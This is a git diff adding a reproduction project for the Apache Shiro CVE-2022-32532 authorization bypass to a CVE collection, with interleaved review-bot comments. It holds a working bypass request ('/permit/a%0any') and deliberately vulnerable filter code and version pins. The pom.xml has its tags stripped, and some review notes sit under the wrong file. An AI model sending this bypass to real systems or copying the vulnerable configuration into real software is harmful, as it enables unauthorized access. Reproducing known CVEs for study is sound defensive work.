diff --git a/.gitmodules b/.gitmodules
index 389186c0193ea7d05d04cb1456c1cec63907e7a9..6ee874bacd796709de4669d922887a302dbfaba8 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -5,3 +5,6 @@
 [submodule "cve/django/2022/CVE-2022-28346/POC_env"]
 path = cve/django/2022/CVE-2022-28346/POC_env
 url = https://github.com/DeEpinGh0st/CVE-2022-28346
+[submodule "cve/apache-Shiro/2022/CVE-2022-32532"]
+ path = cve/apache-Shiro/2022/CVE-2022-32532
+ url = https://github.com/Lay0us1/CVE-2022-32532
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
new file mode 100644
index 0000000000000000000000000000000000000000..549e00a2a96fa9d7c5dbc9859664a78d980158c2
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..975b036663508428b9af8a0ea9661471e50cbe8b
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-32532
+
+## about
+
+This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
+
+In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
+
+## introduce
+
+Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
+
+This request can succeed
+```http request
+GET /permit/any HTTP/1.1
+Token: 4ra1n
+```
+
+Access is not allowed when there is no token request header
+```http request
+GET /permit/any HTTP/1.1
+```
+
+It can be bypassed in a simple way in special but common configurations
+```http request
+GET /permit/a%0any HTTP/1.1
+```
+
+## reference
+
+https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+
+This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
+
+Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
new file mode 100644
index 0000000000000000000000000000000000000000..5210b54759989fd5ac827dcf2250a9274d7693c5
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@@ -0,0 +1,38 @@
+ + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.7.0 + + + com.example + shiro-demo + 0.0.1-SNAPSHOT + shiro-demo + CVE-2022-32532 + + 1.8 + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.shiro + shiro-spring + 1.9.0 + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + +
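Review bot: The `shiro-spring` dependency is pinned to `1.9.0`, which the YAML entry added in this commit places inside the affected range (before 1.9.1), but nothing in the pom says the pin is deliberate, so a reader copying this build file inherits a vulnerable version without warning. Put an XML comment next to the version, e.g. `<!-- Intentionally pinned: 1.9.0 is affected by CVE-2022-32532 (fixed in 1.9.1); this project exists only to reproduce the issue -->`. The XML tags of this hunk appear stripped in this rendering, so the exact element the comment should sit beside cannot be confirmed from here.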
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
new file mode 100644
index 0000000000000000000000000000000000000000..fd71b1a0194c0e4d35b816d622aee7368061be9d
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@@ -0,0 +1,21 @@
+package com.example.shirodemo;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+ @RequestMapping(path = "/permit/{value}")
+ public String permit(@PathVariable String value) {
+ System.out.println("success!");
+ return "success";
+ }
+
+ // Another Bypass
+ // @RequestMapping(path = "/permit/*")
+ public String permit() {
+ System.out.println("success!");
+ return "success";
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
new file mode 100644
index 0000000000000000000000000000000000000000..beaf98ae02e5cbbea207052fd06305c3ebd48f60
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
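Review bot: The parameterless `permit()` overload is unreachable: its `@RequestMapping(path = "/permit/*")` is commented out, so Spring never dispatches to it, and `// Another Bypass` does not say why the method is kept. Either delete it or replace the two comment lines with one that states the intent, e.g. `// Disabled alternative mapping ("/permit/*"): kept only to document a second controller layout affected by the same filter-pattern mismatch; enable one mapping at a time.` Both handlers also report through `System.out.println("success!")` with identical text, so a log line cannot show which mapping served a request; a logger with the mapping named in the message is the conventional choice in a Spring Boot application.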
@@ -0,0 +1,35 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.AccessControlFilter;
+
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+public class MyFilter extends AccessControlFilter {
+
+ public MyFilter(){
+ super();
+ this.pathMatcher = new RegExPatternMatcher();
+ }
+
+ @Override
+ protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
+ String token = ((HttpServletRequest)request).getHeader("Token");
+ // todo: check permission ...
+ return token != null && token.equals("4ra1n");
+ }
+
+ @Override
+ protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
+ System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
+ try {
+ response.getWriter().println("access denied");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return false;
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
new file mode 100644
index 0000000000000000000000000000000000000000..d24431e4e0d43b41931b73c06dfeab64558a19d1
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
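Review bot: `onAccessDenied` writes `access denied` to the body but never sets a response status, so the rejection goes out with whatever status the container defaults to (normally 200) and any client or monitoring that keys on status codes counts the denial as a success. Cast once and set the status before writing: `HttpServletResponse resp = (HttpServletResponse) response; resp.setStatus(HttpServletResponse.SC_FORBIDDEN);` (add `import javax.servlet.http.HttpServletResponse;`), and replace `e.printStackTrace()` in the catch with a logger call. The `Token` check in `isAccessAllowed` compares a hard-coded literal with `String.equals`, which is acceptable for a reproduction but should be labelled so it is not copied: `// Demo only: static shared secret stands in for a real credential check`. The constructor's `this.pathMatcher = new RegExPatternMatcher()` is the configuration this project exists to show; a comment such as `// Deliberately uses RegExPatternMatcher: the CVE-2022-32532 condition` tells a maintainer it is intentional rather than an oversight.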
@@ -0,0 +1,40 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.mgt.*;
+import org.apache.shiro.web.mgt.WebSecurityManager;
+import org.apache.shiro.web.servlet.AbstractShiroFilter;
+
+
+public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
+
+ public MyShiroFilterFactoryBean() {
+ super();
+ }
+
+ @Override
+ protected AbstractShiroFilter createInstance() {
+ SecurityManager securityManager = this.getSecurityManager();
+ FilterChainManager manager = new DefaultFilterChainManager();
+ manager.addFilter("myFilter",new MyFilter());
+ // my filter
+ manager.addToChain("/permit/.*", "myFilter");
+ // todo: add other filters
+
+ PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
+ chainResolver.setFilterChainManager(manager);
+ // set RegExPatternMatcher
+ chainResolver.setPathMatcher(new RegExPatternMatcher());
+ return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
+ }
+
+ static class SpringShiroFilter extends AbstractShiroFilter {
+ protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
+ this.setSecurityManager(webSecurityManager);
+ this.setFilterChainResolver(resolver);
+ }
+ }
+}
+
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
new file mode 100644
index 0000000000000000000000000000000000000000..30a0f1b5101544f54fb098379ca201b45f8a6409
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
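Review bot: The chain manager registers a single chain, `/permit/.*`, so any request whose URI the `RegExPatternMatcher` does not match gets no Shiro chain at all and reaches the servlet unfiltered, which is the fail-open condition the README describes, and the `// todo: add other filters` comment leaves the deny-by-default chain missing. For anything beyond a reproduction the last registered chain should be a catch-all that denies, and the pattern choice deserves a comment: `// Deliberate: "/permit/.*" with RegExPatternMatcher reproduces CVE-2022-32532; in java.util.regex '.' does not match a line terminator unless the pattern is compiled with DOTALL, so the real fix is Shiro >= 1.9.1.` The `(WebSecurityManager) securityManager` cast on the return line is unchecked although `getSecurityManager()` is typed as the generic `SecurityManager`; a guard such as `if (!(securityManager instanceof WebSecurityManager)) { throw new IllegalStateException("securityManager must be a WebSecurityManager"); }` turns a ClassCastException at filter creation into a clear configuration error. Overriding `createInstance()` wholesale also appears to discard whatever chains the parent `ShiroFilterFactoryBean` would build from its own definitions; if that is intended, say so next to the `@Override`.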
@@ -0,0 +1,22 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+public class ShiroConfig {
+
+ @Bean
+ public SecurityManager securityManager() {
+ return new DefaultWebSecurityManager();
+ }
+
+ @Bean
+ public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
+ MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
+ shiroFilterFactoryBean.setSecurityManager(securityManager);
+ return shiroFilterFactoryBean;
+ }
+}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
new file mode 100644
index 0000000000000000000000000000000000000000..5d4615bdf9668a276b9f91d48f28d7dea2255212
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@@ -0,0 +1,13 @@
+package com.example.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShiroDemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShiroDemoApplication.class, args);
+ }
+
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
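Review bot: `securityManager()` returns a `DefaultWebSecurityManager` with no realm attached, so no subject can authenticate through Shiro and the only access control in this application is the header check in `MyFilter`; that is presumably intended for a demo, but nothing in the class says so. A comment on the bean, `// No realm configured: this demo relies solely on MyFilter's Token header check; Shiro authentication is never exercised.`, makes the limitation explicit. Declaring the bean as `public WebSecurityManager securityManager()` (from `org.apache.shiro.web.mgt`) would also let the type express the requirement that `MyShiroFilterFactoryBean.createInstance()` currently enforces with a cast.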
diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..12fb0f1aced261e773290a27a814ff19ec8c1317
--- /dev/null
+++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-32532
+source: https://github.com/Lay0us1/CVE-2022-32532
+info:
+ name: Apache Shiro是美国阿帕奇(Apache)基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。
+ severity: CRITICAL
+ description: |
+ 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。
+ scope-of-influence:
+ Apache Shiro 1.9.1之前
+ reference:
+ - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-32532
+ - https://www.cybersecurity-help.cz/vdb/SB2022062909
+ - https://cxsecurity.com/cveshow/CVE-2022-32532/
+ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-32532
+ cwe-id: CWE-863
+ cnvd-id: CNNVD-202206-2750
+ kve-id: None
+ tags: 旁路授权
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 76b55ee1523e39d3b21a2cffe91e095c91d41365..5d5c89dd537898f0aad7d83cb346d87d988788d3 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -40,7 +40,9 @@ cve:
 apache-unomi:
 - CVE-2020-13942
 apache-struts:
- - CVE-2019-0230
+ - CVE-2019-0230
+ apache-Shiro:
+ - CVE-2022-32532
 Influx-DB:
 - CVE-2019-20933
 linux-kernel: